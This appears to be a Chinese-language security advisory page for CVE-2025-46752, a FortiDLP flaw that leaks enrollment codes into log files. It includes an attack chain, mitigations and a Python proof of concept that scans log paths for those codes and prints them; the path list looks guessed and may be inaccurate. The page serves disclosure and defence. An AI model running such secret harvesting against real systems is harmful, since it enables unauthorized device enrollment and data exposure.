CVE-2025-46752 Fortinet FortiDLP日志敏感信息泄露漏洞

漏洞信息

漏洞编号

CVE-2025-46752

漏洞类型

敏感信息泄露（日志信息泄露）

CVSS评分

4.4 中危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Fortinet FortiDLP

漏洞概述

CVE-2025-46752是Fortinet FortiDLP数据丢失防护（DLP）系统中存在的一个中等严重程度的敏感信息泄露漏洞。该漏洞源于系统在日志文件中插入了敏感信息，具体表现为注册码（enrollment code）被记录到了日志文件中。攻击者通过重新使用（re-using）这些泄露的注册码，可以实现未授权的信息披露。

FortiDLP是Fortinet公司推出的一款企业级数据丢失防护解决方案，用于监控和保护企业敏感数据免受内部威胁和外部攻击。该漏洞影响FortiDLP的多个版本，包括12.0.0至12.0.5、11.5.1、11.4.6以及11.4.5版本。

该漏洞的CVSS 3.1评分为4.4分，属于中等风险级别。虽然漏洞的利用需要本地访问权限和低权限认证，但攻击者一旦获取到日志中的注册码，便可利用该信息进行进一步的攻击活动，如未授权注册设备或绕过安全控制。考虑到FortiDLP通常部署在企业环境中用于保护敏感数据，此漏洞可能对企业数据安全构成潜在威胁。

技术细节

该漏洞的核心问题在于FortiDLP系统在处理注册流程时，将敏感的注册码（enrollment code）写入到了日志文件中。注册码是用于设备或代理注册到FortiDLP管理控制台的关键凭证，正常情况下应当仅在注册过程中临时使用，不应被持久化存储到日志中。

技术原理：
1. 在FortiDLP的注册流程中，系统会生成或使用预配置的注册码来验证新设备/代理的身份。
2. 由于日志记录逻辑存在缺陷，注册码在处理过程中被写入到系统日志文件。
3. 攻击者若能获取到这些日志文件的访问权限（通过本地访问或低权限账户），即可提取出有效的注册码。
4. 攻击者利用获取的注册码，可以在自己的设备上注册到目标FortiDLP系统，实现未授权的信息披露。

利用条件：
- 需要本地访问权限（AV:L）
- 需要低权限认证（PR:L）
- 无需用户交互（UI:N）
- 对机密性和完整性有低影响（C:L/I:L）
- 对可用性无影响（A:N）

该漏洞属于典型的日志信息泄露问题（CWE-532: Insertion of Sensitive Information into Log File），虽然单个漏洞的严重程度有限，但在企业环境中，日志文件通常包含大量敏感信息，攻击者可能通过日志泄露获取更多有价值的数据。

攻击链分析

STEP 1

步骤1：获取本地访问权限

攻击者首先需要获得目标FortiDLP系统的本地访问权限，可以通过物理访问、已感染的终端或其他方式实现。

STEP 2

步骤2：获取低权限账户

攻击者需要拥有一个低权限的本地账户，该账户应具有读取系统日志文件的权限。

STEP 3

步骤3：搜索日志文件

攻击者在FortiDLP的日志文件中搜索敏感信息，特别是注册码（enrollment code）等关键凭证。

STEP 4

步骤4：提取注册码

由于漏洞导致注册码被记录在日志文件中，攻击者可以直接提取这些有效的注册码。

STEP 5

步骤5：重利用注册码

攻击者利用提取的注册码，在自己的设备上注册到目标FortiDLP系统，实现未授权访问和信息披露。

STEP 6

步骤6：信息泄露

成功注册后，攻击者可以访问FortiDLP监控的数据流，获取企业敏感信息，实现数据泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-46752 PoC - FortiDLP Enrollment Code Log Disclosure
# This PoC demonstrates how an attacker with local access and low privileges
# can extract sensitive enrollment codes from FortiDLP log files.

import os
import re
import sys

# Common log file locations for FortiDLP
LOG_PATHS = [
    "/var/log/fortidlp/fortidlp.log",
    "/opt/fortidlp/logs/application.log",
    "/usr/local/fortidlp/logs/enrollment.log",
    "/var/log/fortidlp/enrollment.log",
    "C:\\Program Files\\Fortinet\\FortiDLP\\logs\\fortidlp.log",
    "C:\\ProgramData\\Fortinet\\FortiDLP\\logs\\enrollment.log"
]

# Regex pattern to match enrollment codes in log files
# Enrollment codes are typically alphanumeric strings of specific length
ENROLLMENT_CODE_PATTERN = re.compile(
    r'(enrollment[\s_]?code|registration[\s_]?code|enroll[\s_]?token)[\s:=]+([A-Za-z0-9\-_]{8,64})',
    re.IGNORECASE
)

def search_log_files():
    """Search FortiDLP log files for sensitive enrollment codes"""
    found_codes = []

    for log_path in LOG_PATHS:
        if os.path.exists(log_path):
            print(f"[*] Checking log file: {log_path}")
            try:
                with open(log_path, 'r', encoding='utf-8', errors='ignore') as f:
                    content = f.read()
                    matches = ENROLLMENT_CODE_PATTERN.findall(content)
                    for match in matches:
                        code_type, code_value = match
                        found_codes.append({
                            "type": code_type,
                            "code": code_value,
                            "source": log_path
                        })
                        print(f"[+] Found {code_type}: {code_value}")
            except PermissionError:
                print(f"[-] Permission denied: {log_path}")
            except Exception as e:
                print(f"[-] Error reading {log_path}: {e}")

    return found_codes

def reuse_enrollment_code(code):
    """
    Simulate reusing the extracted enrollment code to register
    a new agent/device to the FortiDLP management console.
    """
    print(f"\n[*] Attempting to reuse enrollment code: {code}")
    # In a real scenario, this would involve connecting to the
    # FortiDLP management server and using the code for registration
    print("[!] This would allow unauthorized device enrollment")
    return True

if __name__ == "__main__":
    print("=" * 60)
    print("CVE-2025-46752 - FortiDLP Enrollment Code Disclosure PoC")
    print("=" * 60)

    codes = search_log_files()

    if codes:
        print(f"\n[!] Total enrollment codes found: {len(codes)}")
        for code_info in codes:
            reuse_enrollment_code(code_info["code"])
    else:
        print("\n[-] No enrollment codes found in accessible log files")
        print("[*] Try running with elevated privileges or check additional log paths")

影响范围

Fortinet FortiDLP 12.0.0

Fortinet FortiDLP 12.0.1

Fortinet FortiDLP 12.0.2

Fortinet FortiDLP 12.0.3

Fortinet FortiDLP 12.0.4

Fortinet FortiDLP 12.0.5

Fortinet FortiDLP 11.5.1

Fortinet FortiDLP 11.4.6

Fortinet FortiDLP 11.4.5

防御指南

临时缓解措施

在应用官方补丁之前，建议采取以下临时缓解措施：1）审查FortiDLP系统日志文件，识别并删除其中包含的注册码等敏感信息；2）限制本地用户对日志文件的访问权限，仅允许必要的管理员账户读取；3）重新生成所有注册码并禁用可能已泄露的旧注册码；4）监控FortiDLP管理控制台的注册活动，及时发现未授权的设备注册行为；5）考虑在FortiDLP前端部署额外的访问控制机制，限制对管理接口的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-46752
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-46752
3 Details https://www.cvedetails.com/cve/CVE-2025-46752/
4 VulDB https://vuldb.com/cve/CVE-2025-46752
5 Link https://fortiguard.fortinet.com/psirt/FG-IR-25-160